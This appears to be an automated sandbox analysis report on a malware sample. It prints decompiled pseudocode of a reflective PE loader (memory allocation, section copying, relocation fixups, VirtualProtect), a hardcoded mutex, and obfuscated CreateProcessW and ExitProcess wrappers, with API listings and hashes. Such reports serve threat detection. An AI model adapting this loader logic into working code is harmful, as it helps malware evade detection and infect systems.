														}
														E6F31E93F(_t220);
														_t398 = _t398 + 4;
													}
													_t221 =  *((intOrPtr*)(_t362 + 4));
													if(_t221 != 0) {
														 *((intOrPtr*)( *((intOrPtr*)(_t362 + 0x20))))(_t221, 0, 0x8000,  *(_t362 + 0x34));
													}
													HeapFree(_v100(), 0, _t362);
													return E6F31C65E(_v8 ^ _t396);
												} else {
													_t231 = VirtualAlloc(_v60,  *(_t297 + 0x54), 0x1000, 4); // executed
													_t376 = _t231;
													E6F31DD40(_t376, _v48,  *(_t297 + 0x54));
													_t397 = _t397 + 0xc;
													_v64 = 0;
													_t235 = _t376 + _v48[0xf];
													 *_t362 = _t235;
													 *((intOrPtr*)(_t235 + 0x34)) = _v60;
													_t314 =  *_t362;
													_t345 =  *((intOrPtr*)(_t362 + 4));
													_v52 = _t345;
													_t237 = ( *(_t314 + 0x14) & 0x0000ffff) + 0x24;
													if(0 >=  *(_t314 + 6)) {
														L29:
														_t239 =  *((intOrPtr*)(_t314 + 0x34)) -  *(_t297 + 0x34);
														_v68 = _t239;
														if(_t239 == 0) {
															L51:
															_t240 = 1;
														} else {
															if( *((intOrPtr*)(_t314 + 0xa4)) != 0) {
																_t353 =  *((intOrPtr*)(_t362 + 4));
																_t301 =  *((intOrPtr*)(_t314 + 0xa0)) + _t353;
																_v56 = _t353;
																_t267 =  *_t301;
																if(_t267 != 0) {
																	do {
																		_t329 =  *((intOrPtr*)(_t301 + 4));
																		_v72 = _t267 + _t353;
																		_t354 = _t301 + 8;
																		_t390 = 0;
																		if((_t329 - 0x00000008 & 0xfffffffe) > 0) {
																			_t369 = _v72;
																			do {
																				_t270 =  *_t354 & 0x0000ffff;
																				if((_t270 & 0x0000f000) == 0x3000) {
																					 *((intOrPtr*)((_t270 & 0x00000fff) + _t369)) =  *((intOrPtr*)((_t270 & 0x00000fff) + _t369)) + _v68;
																				}
																				_t329 =  *((intOrPtr*)(_t301 + 4));
																				_t390 = _t390 + 1;
																				_t354 =  &(_t354[1]);
																			} while (_t390 < _t329 - 8 >> 1);
																		}
																		_t267 =  *((intOrPtr*)(_t301 + _t329));
																		_t301 = _t301 + _t329;
																		_t353 = _v56;
																	} while (_t267 != 0);
																	_t362 = _v76;
																}
																goto L51;
															} else {
																_t240 = 0;
															}
														}
														 *(_t362 + 0x18) = _t240;
														if(E6F31B920(_t362) == 0) {
															goto L33;
														} else {
															_t298 =  *_t362;
															_t379 = ( *(_t298 + 0x14) & 0x0000ffff) + _t298;
															_t242 =  *(_t379 + 0x20);
															_t318 =  ~( *(_t362 + 0x40)) & _t242;
															_t346 =  *((intOrPtr*)(_t379 + 0x28));
															_v64 = _t242;
															_v96 = _t242;
															_v68 = _t318;
															_v92 = _t318;
															if(_t346 == 0) {
																_t266 =  *(_t379 + 0x3c);
																if((_t266 & 0x00000040) == 0) {
																	if(_t266 < 0) {
																		_t346 =  *((intOrPtr*)(_t298 + 0x24));
																	}
																} else {
																	_t346 =  *((intOrPtr*)(_t298 + 0x20));
																}
															}
															_t319 =  *(_t379 + 0x3c);
															_v88 = _t346;
															_v84 = _t319;
															_v80 = 0;
															_v72 = 1;
															if(1 >=  *(_t298 + 6)) {
																L75:
																_v80 = 1;
																_t244 = E6F31B860(_t298, _t362,  &_v96, _t362, _t379); // executed
																if(_t244 == 0) {
																	goto L33;
																} else {
																	_t348 =  *_t362;
																	_t321 = _t348;
																	_t380 =  *((intOrPtr*)(_t348 + 0xc0));
																	if(_t380 != 0) {
																		_t299 =  *((intOrPtr*)(_t362 + 4));
																		_t384 =  *((intOrPtr*)(_t380 + _t299 + 0xc));
																		if(_t384 != 0) {
																			_t253 =  *_t384;
																			if(_t253 != 0) {
																				do {
																					 *_t253(_t299, 1, 0);
																					_t253 =  *((intOrPtr*)(_t384 + 4));
																					_t384 = _t384 + 4;
																				} while (_t253 != 0);
																				_t321 =  *_t362;
																			}
																		}
																	}
																	_t245 =  *((intOrPtr*)(_t321 + 0x28));
																	if(_t245 == 0) {
																		 *(_t362 + 0x38) = 0;
																		return E6F31C65E(_v8 ^ _t396);
																	} else {
																		_t248 = _t245 + _v60;
																		if( *(_t362 + 0x14) == 0) {
																			 *(_t362 + 0x38) = _t248;
																			return E6F31C65E(_v8 ^ _t396);
																		} else {
																			 *(_t362 + 0x3c) = _t248;
																			 *(_t362 + 0x10) = 1;
																			return E6F31C65E(_v8 ^ _t396);
																		}
																	}
																}
															} else {
																_t255 = _t379 + 0x64;
																_v48 = _t255;
																do {
																	_v56 =  *((intOrPtr*)(_t255 - 0x1c));
																	_t367 =  *((intOrPtr*)(_t255 - 0x14));
																	_t388 =  ~( *(_t362 + 0x40)) & _v56;
																	_v52 = _t367;
																	_t362 = _v76;
																	if(_t367 == 0) {
																		if(( *_t255 & 0x00000040) == 0) {
																			if(( *_t255 & 0x00000080) != 0) {
																				_t368 =  *((intOrPtr*)(_t298 + 0x24));
																				goto L65;
																			}
																		} else {
																			_t368 =  *((intOrPtr*)(_t298 + 0x20));
																			L65:
																			_v52 = _t368;
																			_t362 = _v76;
																		}
																	}
																	if(_v68 == _t388) {
																		L71:
																		_t319 = _t319 |  *_t255;
																		asm("bt eax, 0x19");
																		if(_t319 >= 0) {
																			_t319 = _t319 & 0xfdffffff;
																		}
																		_t346 = _v52 - _v64 + _v56;
																		_t258 = _v48;
																		goto L74;
																	} else {
																		if(_v64 + _t346 > _t388) {
																			_t255 = _v48;
																			goto L71;
																		} else {
																			_t263 = E6F31B860(_t298, _t362,  &_v96, _t362, _t388); // executed
																			if(_t263 == 0) {
																				goto L33;
																			} else {
																				_t264 = _v56;
																				_t346 = _v52;
																				_t298 =  *_t362;
																				_v64 = _t264;
																				_v96 = _t264;
																				_t265 = _t388;
																				_v68 = _t265;
																				_v92 = _t265;
																				_t258 = _v48;
																				_t319 =  *_t258;
																				goto L74;
																			}
																		}
																	}
																	goto L89;
																	L74:
																	_v48 =  &(_t258[0xa]);
																	_t379 = _v72 + 1;
																	_v84 = _t319;
																	_t255 = _v48;
																	_v88 = _t346;
																	_v72 = _t379;
																} while (_t379 < ( *(_t298 + 6) & 0x0000ffff));
																goto L75;
															}
														}
													} else {
														_t302 = _t237 + _t314;
														do {
															_t333 =  *((intOrPtr*)(_t302 + 4));
															if(_t333 != 0) {
																if(_v56 <  *((intOrPtr*)(_t302 + 8)) + _t333) {
																	SetLastError(0xd);
																	goto L33;
																} else {
																	_t279 =  *((intOrPtr*)( *((intOrPtr*)(_t362 + 0x1c))))( *_t302 + _t345, _t333, 0x1000, 4,  *(_t362 + 0x34)); // executed
																	_t397 = _t397 + 0x14;
																	if(_t279 == 0) {
																		goto L33;
																	} else {
																		_t392 =  *_t302 + _v52;
																		E6F31DD40(_t392,  *((intOrPtr*)(_t302 + 8)) + _v48,  *((intOrPtr*)(_t302 + 4)));
																		 *((intOrPtr*)(_t302 - 4)) = _t392;
																		goto L26;
																	}
																}
															} else {
																_t395 =  *((intOrPtr*)( &(_v48[0xe]) + _v72));
																if(_t395 <= 0) {
																	goto L27;
																} else {
																	_t288 =  *((intOrPtr*)( *((intOrPtr*)(_t362 + 0x1c))))( *_t302 + _t345, _t395, 0x1000, 4,  *(_t362 + 0x34));
																	_t397 = _t397 + 0x14;
																	if(_t288 == 0) {
																		goto L33;
																	} else {
																		 *((intOrPtr*)(_t302 - 4)) =  *_t302 + _v52;
																		E6F31D230(_t362,  *_t302 + _v52, 0, _t395);
																		L26:
																		_t345 = _v52;
																		_t397 = _t397 + 0xc;
																		goto L27;
																	}
																}
															}
															goto L89;
															L27:
															_t314 =  *_t362;
															_t302 = _t302 + 0x28;
															_t394 = _v64 + 1;
															_v64 = _t394;
														} while (_t394 < ( *(_t314 + 6) & 0x0000ffff));
														_t297 = _v68;
														goto L29;
													}
												}
											} else {
												VirtualFree(_v60, _t212, 0x8000);
												goto L15;
											}
										} else {
											_t293 = VirtualAlloc(_t209, _t361, 0x3000, 4);
											_v60 = _t293;
											if(_t293 == 0) {
												L15:
												_push(0xe);
												L88:
												SetLastError();
												return E6F31C65E(_v8 ^ _t396);
											} else {
												goto L13;
											}
										}
									}
								}
							}
						} else {
							goto L3;
						}
					}
				}
				L89:
			}

0x6f31bb36
0x6f31bb3d
0x6f31bb43
0x6f31bb45
0x6f31bb46
0x6f31bb48
0x6f31bb4b
0x6f31bb4e
0x6f31bb52
0x6f31bb72
0x6f31bb72
0x00000000
0x6f31bb54
0x6f31bb5c
0x6f31c0b0
0x6f31c0b0
0x00000000
0x6f31bb62
0x6f31bb62
0x6f31bb62
0x6f31bb65
0x6f31bb68
0x6f31bb70
0x6f31bb80
0x6f31bb83
0x6f31bb86
0x00000000
0x6f31bb9b
0x6f31bb9b
0x6f31bba1
0x00000000
0x6f31bba7
0x6f31bbab
0x6f31bbaf
0x6f31bbb4
0x6f31bbb6
0x6f31bbb8
0x6f31bbb8
0x6f31bbbb
0x6f31bbc0
0x6f31bbc3
0x6f31bbc8
0x6f31bbcb
0x6f31bbcd
0x6f31bbd0
0x6f31bbd0
0x6f31bbb8
0x6f31bbd9
0x6f31bbdf
0x6f31bbe8
0x6f31bbf2
0x6f31bbf8
0x00000000
0x6f31bbfe
0x6f31bc0f
0x6f31bc11
0x6f31bc16
0x6f31bc2a
0x6f31bc33
0x6f31bc39
0x6f31bc3f
0x6f31bc41
0x6f31bc46
0x6f31bc64
0x6f31bc71
0x6f31bc78
0x6f31bc7b
0x6f31bc82
0x6f31bc89
0x6f31bc90
0x6f31bc97
0x6f31bca1
0x6f31bcae
0x6f31bde2
0x6f31bde5
0x6f31bdea
0x6f31bded
0x6f31bdf2
0x6f31bdf4
0x6f31bdf9
0x6f31be00
0x6f31be00
0x6f31be03
0x6f31be08
0x6f31be11
0x6f31be13
0x6f31be16
0x6f31be16
0x6f31be19
0x6f31be1a
0x6f31be00
0x6f31be20
0x6f31be25
0x6f31be25
0x6f31be28
0x6f31be2d
0x6f31be3d
0x6f31be3f
0x6f31be49
0x6f31be61
0x6f31bcb4
0x6f31bcc1
0x6f31bcc6
0x6f31bccc
0x6f31bcd4
0x6f31bcda
0x6f31bce4
0x6f31bce8
0x6f31bcea
0x6f31bced
0x6f31bcef
0x6f31bcf2
0x6f31bcf9
0x6f31bd00
0x6f31bdb7
0x6f31bdba
0x6f31bdbd
0x6f31bdc0
0x6f31becd
0x6f31becd
0x6f31bdc6
0x6f31bdcd
0x6f31be62
0x6f31be6b
0x6f31be6d
0x6f31be70
0x6f31be74
0x6f31be76
0x6f31be76
0x6f31be7b
0x6f31be7e
0x6f31be81
0x6f31be8b
0x6f31be8d
0x6f31be90
0x6f31be90
0x6f31bea1
0x6f31beab
0x6f31beab
0x6f31beae
0x6f31beb1
0x6f31beb2
0x6f31beba
0x6f31be90
0x6f31bebe
0x6f31bec1
0x6f31bec3
0x6f31bec6
0x6f31beca
0x6f31beca
0x00000000
0x6f31bdd3
0x6f31bdd3
0x6f31bdd3
0x6f31bdcd
0x6f31bed4
0x6f31bede
0x00000000
0x6f31bee4
0x6f31bee4
0x6f31beef
0x6f31bef1
0x6f31bef4
0x6f31bef6
0x6f31bef9
0x6f31befc
0x6f31beff
0x6f31bf02
0x6f31bf07
0x6f31bf09
0x6f31bf0e
0x6f31bf17
0x6f31bf19
0x6f31bf19
0x6f31bf10
0x6f31bf10
0x6f31bf10
0x6f31bf0e
0x6f31bf1c
0x6f31bf24
0x6f31bf27
0x6f31bf2a
0x6f31bf31
0x6f31bf3c
0x6f31c005
0x6f31c008
0x6f31c011
0x6f31c018
0x00000000
0x6f31c01e
0x6f31c01e
0x6f31c020
0x6f31c022
0x6f31c02a
0x6f31c02c
0x6f31c02f
0x6f31c035
0x6f31c037
0x6f31c03b
0x6f31c040
0x6f31c045
0x6f31c047
0x6f31c04a
0x6f31c04d
0x6f31c051
0x6f31c051
0x6f31c03b
0x6f31c035
0x6f31c053
0x6f31c058
0x6f31c096
0x6f31c0af
0x6f31c05a
0x6f31c05a
0x6f31c061
0x6f31c080
0x6f31c095
0x6f31c063
0x6f31c063
0x6f31c068
0x6f31c07f
0x6f31c07f
0x6f31c061
0x6f31c058
0x6f31bf42
0x6f31bf42
0x6f31bf45
0x6f31bf50
0x6f31bf53
0x6f31bf59
0x6f31bf5e
0x6f31bf63
0x6f31bf66
0x6f31bf69
0x6f31bf6e
0x6f31bf78
0x6f31bf7a
0x00000000
0x6f31bf7a
0x6f31bf70
0x6f31bf70
0x6f31bf7d
0x6f31bf7d
0x6f31bf80
0x6f31bf80
0x6f31bf6e
0x6f31bf86
0x6f31bfc3
0x6f31bfc9
0x6f31bfcb
0x6f31bfcf
0x6f31bfd1
0x6f31bfd1
0x6f31bfdd
0x6f31bfe0
0x00000000
0x6f31bf88
0x6f31bf8f
0x6f31bfc0
0x00000000
0x6f31bf91
0x6f31bf96
0x6f31bf9d
0x00000000
0x6f31bfa3
0x6f31bfa3
0x6f31bfa6
0x6f31bfa9
0x6f31bfab
0x6f31bfae
0x6f31bfb1
0x6f31bfb3
0x6f31bfb6
0x6f31bfb9
0x6f31bfbc
0x00000000
0x6f31bfbc
0x6f31bf9d
0x6f31bf8f
0x00000000
0x6f31bfe3
0x6f31bfe9
0x6f31bfec
0x6f31bff3
0x6f31bff6
0x6f31bff9
0x6f31bffc
0x6f31bffc
0x00000000
0x6f31bf50
0x6f31bf3c
0x6f31bd06
0x6f31bd06
0x6f31bd10
0x6f31bd10
0x6f31bd15
0x6f31bd60
0x6f31bddc
0x00000000
0x6f31bd62
0x6f31bd75
0x6f31bd77
0x6f31bd7c
0x00000000
0x6f31bd7e
0x6f31bd89
0x6f31bd8e
0x6f31bd93
0x00000000
0x6f31bd93
0x6f31bd7c
0x6f31bd17
0x6f31bd1d
0x6f31bd23
0x00000000
0x6f31bd25
0x6f31bd38
0x6f31bd3a
0x6f31bd3f
0x00000000
0x6f31bd45
0x6f31bd4e
0x6f31bd51
0x6f31bd96
0x6f31bd96
0x6f31bd99
0x00000000
0x6f31bd99
0x6f31bd3f
0x6f31bd23
0x00000000
0x6f31bd9c
0x6f31bd9c
0x6f31bd9e
0x6f31bda4
0x6f31bda5
0x6f31bdac
0x6f31bdb4
0x00000000
0x6f31bdb4
0x6f31bd00
0x6f31bc48
0x6f31bc51
0x00000000
0x6f31bc51
0x6f31bc18
0x6f31bc21
0x6f31bc23
0x6f31bc28
0x6f31bc57
0x6f31bc57
0x6f31c0b5
0x6f31c0b5
0x6f31c0cd
0x00000000
0x00000000
0x00000000
0x6f31bc28
0x6f31bc16
0x6f31bbf8
0x6f31bba1
0x00000000
0x00000000
0x00000000
0x6f31bb70
0x6f31bb5c
0x00000000

APIs

GetNativeSystemInfo.KERNELBASE(?,-00000017,00FA6A40,00000000), ref: 6F31BBD9
VirtualAlloc.KERNELBASE(?,?,00003000,00000004), ref: 6F31BC0F
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 6F31BC21
HeapAlloc.KERNEL32(00000000), ref: 6F31BC39
VirtualFree.KERNEL32(?,00000000,00008000), ref: 6F31BC51

Part of subcall function 6F31B840: SetLastError.KERNEL32(0000000D,6F31BCAC), ref: 6F31B846

VirtualAlloc.KERNELBASE(?,?,00001000,00000004), ref: 6F31BCC1
SetLastError.KERNEL32(0000000D), ref: 6F31BDDC
HeapFree.KERNEL32(00000000), ref: 6F31BE49
SetLastError.KERNEL32(0000000D,-00000017,00FA6A40,00000000), ref: 6F31C0B5

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual$ErrorLast$FreeHeap$InfoNativeSystem
String ID:
API String ID: 2732102410-0
Opcode ID: 2bbf3687ef546036623816be913eab59f9ab59475c0a0280c124ea19736cf206
Instruction ID: 8b248c96a90d90837d8586d47a83352f336397b95bc9f43f9b5d7af2c6ca312f
Opcode Fuzzy Hash: 2bbf3687ef546036623816be913eab59f9ab59475c0a0280c124ea19736cf206
Instruction Fuzzy Hash: B9128A71A04619DFDB18CFA8C980BA9B7B5FF48344F14816AE919AF781D732E851CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6F301000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 8
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F301000() {
				long _t2;
				intOrPtr* _t4;

				CreateMutexA(0, 1, "7ce3e80173264ea19b05306b865eadf9"); // executed
				_t2 = GetLastError();
				 *_t4 =  *_t4 + _t2;
				return _t2;
			}

0x6f30100b
0x6f301011
0x6f301017
0x6f30101a

APIs

CreateMutexA.KERNELBASE(00000000,00000001,7ce3e80173264ea19b05306b865eadf9,6F301029,6F3010E6,6F319D3B,00000001,00000000), ref: 6F30100B
GetLastError.KERNEL32 ref: 6F301011

Strings

@Mxt7ce3e80173264ea19b05306b865eadf9, xrefs: 6F301011

Memory Dump Source

Source File: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateErrorLastMutex
String ID: @Mxt7ce3e80173264ea19b05306b865eadf9
API String ID: 1925916568-2035636723
Opcode ID: 40ccf2432cc1f75d8a5ad5d36abc574d0c38e8d15083cbeb4006460f39b4689b
Instruction ID: 8aa11959e0d29f8dfb188fba2402991f0cd014d22f45378112705bd2657c6ba3
Opcode Fuzzy Hash: 40ccf2432cc1f75d8a5ad5d36abc574d0c38e8d15083cbeb4006460f39b4689b
Instruction Fuzzy Hash: 1FC04CB0148B009BDB407F60D849B14B679AB83723F00451CB24144094DEA104648B21

Uniqueness

Uniqueness Score: -1.00%

Function 6F32288D, Relevance: 4.6, APIs: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6F32288D(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _t7;
				void* _t8;
				void* _t13;
				void* _t24;
				WCHAR* _t26;

				_t18 = __ecx;
				_push(__ecx);
				_t26 = GetEnvironmentStringsW();
				if(_t26 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t17 = E6F322856(_t26) - _t26 >> 1;
					_t7 = E6F3227A9(0, 0, _t26, E6F322856(_t26) - _t26 >> 1, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E6F31FEB1(_t18, _t7); // executed
						_t24 = _t8;
						if(_t24 == 0 || E6F3227A9(0, 0, _t26, _t17, _t24, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t24;
							_t24 = 0;
						}
						E6F31FEFF(_t24);
					}
				}
				if(_t26 != 0) {
					FreeEnvironmentStringsW(_t26);
				}
				return _t13;
			}

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6F322896
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F322904

Part of subcall function 6F3227A9: WideCharToMultiByte.KERNEL32(?,00000000,6F32084A,00000000,00000001,6F3207E3,6F323ABD,?,6F32084A,?,00000000,?,6F323834,0000FDE9,00000000,?), ref: 6F32284B

Part of subcall function 6F31FEB1: RtlAllocateHeap.NTDLL(00000000,6F35E844,6F35E824,?,6F31C421,0000BC00,6F35E844,00000000), ref: 6F31FEE3

_free.LIBCMT ref: 6F3228F5

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: a78d038eed7d5763e2a42d2a64404ee49dcc91169210083d0fe391fa9015d25d
Instruction ID: 8aee30954fd766b204fda49cf1ebaf3824ca4da8d5f1b3faaf20e93be692b809
Opcode Fuzzy Hash: a78d038eed7d5763e2a42d2a64404ee49dcc91169210083d0fe391fa9015d25d
Instruction Fuzzy Hash: B401D472A157157B772145BE0E88CBB2AEDDED3AB4311012ABE14C2240EF62CC1191F1

Uniqueness

Uniqueness Score: -1.00%

Function 100231D2, Relevance: 1.6, APIs: 1, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E100231D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E10022523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
				_v20 = _v20 ^ 0x003ae9c9;
				E10002309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}

0x100231da
0x100231df
0x100231e1
0x100231e4
0x100231e7
0x100231e8
0x100231e9
0x100231ec
0x100231ef
0x100231f2
0x100231f3
0x100231f4
0x100231f7
0x100231fa
0x100231fd
0x100231fe
0x10023200
0x10023205
0x1002320f
0x10023214
0x1002321b
0x1002321f
0x10023223
0x1002322a
0x10023231
0x10023235
0x10023241
0x10023249
0x1002324c
0x10023253
0x1002325a
0x1002325e
0x10023265
0x1002326c
0x10023273
0x1002327a
0x10023281
0x100232a1
0x100232bb
0x100232c2

APIs

CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 100232BB

Memory Dump Source

Source File: 00000004.00000002.361065013.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.361057801.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.361113607.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: db286c9e9bcad3bd2e87b522c53d89c9dfc5ed19f2ace101bae5327955dfaec9
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: 21311476801248BBCF65DF96CD49CDFBFB5FB89704F108188F914A6220D3B58A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F31B860, Relevance: 1.6, APIs: 1, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6F31B860(void* __ebx, intOrPtr* __ecx, void** __edx, void* __edi, void* __esi) {
				signed int _v8;
				long _v12;
				signed int _t20;
				int _t32;
				signed int _t41;
				intOrPtr* _t42;
				signed int _t45;
				long _t52;
				unsigned int _t54;
				void* _t56;
				signed int _t57;

				_t42 = __ecx;
				_t20 =  *0x6f34609c; // 0xdcaf13c8
				_v8 = _t20 ^ _t57;
				_t52 = __edx[2];
				if(_t52 == 0) {
					L8:
					return E6F31C65E(_v8 ^ _t57);
				} else {
					_t54 = __edx[3];
					if((_t54 & 0x02000000) == 0) {
						_t45 =  *(((_t54 >> 0x0000001d & 0x00000001) << 4) + 0x6f32d178);
						_t31 =  ==  ? _t45 : _t45 | 0x00000200;
						_t32 = VirtualProtect( *__edx, _t52,  ==  ? _t45 : _t45 | 0x00000200,  &_v12); // executed
						if(_t32 != 0) {
							goto L8;
						} else {
							return E6F31C65E(_v8 ^ _t57);
						}
					} else {
						_t56 =  *__edx;
						if(_t56 == __edx[1]) {
							if(__edx[4] != 0) {
								L6:
								 *((intOrPtr*)( *((intOrPtr*)(_t42 + 0x20))))(_t56, _t52, 0x4000,  *((intOrPtr*)(_t42 + 0x34))); // executed
							} else {
								_t41 =  *(__ecx + 0x40);
								if( *((intOrPtr*)( *__ecx + 0x38)) == _t41 || _t52 % _t41 == 0) {
									goto L6;
								}
							}
						}
						goto L8;
					}
				}
			}

0x6f31b860
0x6f31b866
0x6f31b86d
0x6f31b872
0x6f31b877
0x6f31b8ba
0x6f31b8cd
0x6f31b879
0x6f31b879
0x6f31b882
0x6f31b8d9
0x6f31b8f0
0x6f31b8f7
0x6f31b8ff
0x00000000
0x6f31b901
0x6f31b910
0x6f31b910
0x6f31b884
0x6f31b884
0x6f31b889
0x6f31b890
0x6f31b8a6
0x6f31b8b3
0x6f31b892
0x6f31b894
0x6f31b89a
0x00000000
0x00000000
0x6f31b89a
0x6f31b8b8
0x00000000
0x6f31b889
0x6f31b882

APIs

VirtualProtect.KERNELBASE(?,?,?,?,00000000,?,?,6F31C016), ref: 6F31B8F7

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7479e248098c4f50b84467003bb24279a33e38e428b99990d571c973cf558f46
Instruction ID: e82797ce2646cc979a39e78a259e6b0b79ee9fffeb2fde147b148b39be491066
Opcode Fuzzy Hash: 7479e248098c4f50b84467003bb24279a33e38e428b99990d571c973cf558f46
Instruction Fuzzy Hash: F511B172B041059BEB04DE69D880B9AB7B9FF85714F1541AEE8189F391DB32FD41C780

Uniqueness

Uniqueness Score: -1.00%

Function 10004248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10004248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E10002309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}

0x1000424e
0x10004254
0x1000425b
0x10004262
0x10004269
0x10004272
0x10004277
0x1000427c
0x10004283
0x1000428a
0x10004291
0x10004298
0x100042a2
0x100042aa
0x100042ad
0x100042b1
0x100042b5
0x100042bc
0x100042c3
0x100042c7
0x100042e7
0x100042f1

APIs

ExitProcess.KERNEL32(00000000), ref: 100042F1

